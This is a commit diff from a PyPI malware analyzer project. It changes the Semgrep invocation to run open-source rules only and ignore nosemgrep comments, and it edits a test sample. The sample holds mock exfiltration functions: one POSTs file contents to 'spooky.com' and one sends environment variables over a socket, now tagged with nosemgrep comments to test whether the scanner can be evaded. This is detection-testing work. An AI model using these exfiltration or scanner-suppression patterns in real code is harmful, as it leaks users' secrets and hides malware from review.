Skip to content

Commit 6cbbef6

Browse files
committed
fix: semgrep now only runs open-source functionality, and disabled the nosemgrep feature
1 parent 5083183 commit 6cbbef6

File tree

2 files changed

+35
-22
lines changed

2 files changed

+35
-22
lines changed

src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py

Lines changed: 28 additions & 15 deletions
Original file line numberDiff line numberDiff line change
@@ -33,23 +33,29 @@
3333
class PyPISourcecodeAnalyzer(BaseHeuristicAnalyzer):
3434
"""This class is used to analyze the source code of python PyPI packages. This analyzer is a work in progress.
3535
36-
This analyzer works in two phases. In the first phase, it will perform a pattern-based scan of all python files
37-
in the source code, looking for suspicious patterns defined by the YAML file in defaults.ini. By default, this
38-
will include suspicious package imports, suspicious hardcoded constants, and suspicious function calls. If this
39-
scan does not find any suspicious activity, the analysis will stop and the package will be marked as benign
40-
by this analyzer. If the scan does find suspicious activity, the analyzer will move on to the second phase.
41-
42-
In the second phase, the analyzer will perform dataflow analysis. This will track the flow of suspicious constants
43-
and the results of suspicious function calls to where they are used, to determine if they are used in a malicious
44-
manner. Suspicious activity includes data exfiltration, code execution, remote connections, operating system and
45-
process manipulation, and encoded and obfuscated patterns. The types of activity, and their severity and quantity,
46-
will then determine the probability of the package being malicious.
47-
48-
Currently, this analyzer only supports the first phase, and will return simply boolean results on the maliciousness
49-
of the package.
36+
Currently the analyzer performs textual pattern matching and dataflow analysis using the open-source features of
37+
Semgrep. Semgrep's open-source taint tracking is intraprocedural only (it cannot follow data across function or file boundaries); this is a known limitation. Default
38+
rules are stored in 'macaron/resources/pypi_malware_rules' as semgrep .yaml rule files. A user may add additional
39+
rules by specifying a directory containing them in the 'defaults.ini' configuration file.
5040
"""
5141

5242
def __init__(self, resources_path: str | None = None) -> None:
43+
"""
44+
Initialise the source code analyzer and load default and custom semgrep rulesets.
45+
46+
Parameters
47+
----------
48+
resources_path: str | None
49+
The path to the resources directory which must contain a 'pypi_malware_rules' directory of
50+
semgrep rules. If None is provided, then this is loaded from the global config resources path.
51+
Defaults to None
52+
53+
Raises
54+
------
55+
ConfigurationError
56+
If the default rule path is invalid, the heuristic.pypi entry is not present, or if the semgrep
57+
validation of the custom rule path failed.
58+
"""
5359
super().__init__(
5460
name="anomalous_version_analyzer",
5561
heuristic=Heuristics.SUSPICIOUS_PATTERNS,
@@ -65,6 +71,12 @@ def _load_defaults(self, resources_path: str) -> tuple[str, str | None]:
6571
6672
Semgrep validation is run on the custom rules provided by the user.
6773
74+
Parameters
75+
----------
76+
resources_path: str
77+
The path to the resources directory which must contain a 'pypi_malware_rules' directory of
78+
semgrep rules.
79+
6880
Returns
6981
-------
7082
tuple[str, str | None]
@@ -140,7 +152,8 @@ def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicRes
140152
if there is no source code available.
141153
"""
142154
analysis_result: defaultdict = defaultdict(list)
143-
semgrep_commands: list[str] = ["semgrep", "scan"]
155+
# Only run semgrep open-source features, and disable 'nosemgrep' ignore comments so that scanned packages cannot use them to bypass our scan.
156+
semgrep_commands: list[str] = ["semgrep", "scan", "--oss-only", "--disable-nosem"]
144157
result: HeuristicResult = HeuristicResult.PASS
145158

146159
source_code_path = pypi_package_json.package_sourcecode_path

tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py

Lines changed: 7 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -41,10 +41,10 @@ def file_exfil_to_urllib3():
4141
http = man().request
4242
http('POST', "spooky.com", body=oo.read(file, 2048))
4343

44-
def environ_to_socket():
45-
import socket as s
46-
from os import environ as environment_vars
47-
with s.socket(s.AF_INET, s.SOCK_STREAM) as soc:
48-
soc.connect(('localhost', 0))
49-
other = soc
50-
other.send(environment_vars)
44+
def environ_to_socket(): # nosemgrep
45+
import socket as s # nosemgrep
46+
from os import environ as environment_vars # nosemgrep
47+
with s.socket(s.AF_INET, s.SOCK_STREAM) as soc: # nosemgrep
48+
soc.connect(('localhost', 0)) # nosemgrep
49+
other = soc # nosemgrep
50+
other.send(environment_vars) # nosemgrep

0 commit comments

Comments
 (0)